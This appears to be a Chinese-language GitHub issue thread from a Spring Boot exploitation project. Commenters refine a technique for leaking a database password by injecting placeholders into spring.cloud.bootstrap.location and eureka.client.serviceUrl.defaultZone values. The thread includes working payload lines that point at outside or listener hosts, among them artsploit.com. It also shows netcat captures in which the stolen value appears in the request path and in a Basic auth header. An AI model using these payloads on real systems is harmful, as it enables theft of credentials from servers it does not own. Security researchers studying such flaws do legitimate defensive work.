Comments (3)
纠正一下:
-
出处不是你给的文章里的内容,利用
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml
偷密码跟本不能复现,有理由怀疑根本不行,而作者没有测试或者跟踪源码 -
你可以跟一下
eureka.client.serviceUrl.defaultZone
偷密码那个流程,结合了eureka
的认证流程,所以可以外带密码
from springbootvulexploit.
ok, 多谢师傅指正,
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml
这里确实不能在认证头里面带出来密码, 这里会被springboot忽视掉, 但是可以用下面这种
spring.cloud.bootstrap.location=http://127.0.0.1:8888/${somedb.password}.yml
Listening on [0.0.0.0] (family 0, port 8888)
Connection from localhost 1188 received!
HEAD /123456.yml HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_201
Host: 127.0.0.1:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
这个
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000
利用手法也是去年3月份挖Eureka
的时候偶然发现的,
总的**还是从让Spring对占位符进行填充星号字段
来实现数据外带,
选择认证头的原因是也是偶然, 当时看到eureka
进行访问的url_path
是/apps/
,
以为不可以在url_path
传, 也想过http请求出不来的情况, 甚至是dnslog传.
刚才试了一下, 确实也可以在url_path
里传递
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000/123123
Listening on [0.0.0.0] (family 0, port 5000)
Connection from localhost 1319 received!
GET /123123/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 192.168.175.1
Accept-Encoding: gzip
Host: 127.0.0.1:5000
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.6.2
Authorization: Basic MTIzNDU2Om51bGw=
spring.cloud.bootstrap.location
是我今年写文章的时候看到这的点可以rce, 看到也是HTTP请求,拓展了一下, 没来及测试, 确实不够严谨, 我会在文章里改掉这一点。
from springbootvulexploit.
学习了,确实可以从目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据
from springbootvulexploit.
Related Issues (8)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from springbootvulexploit.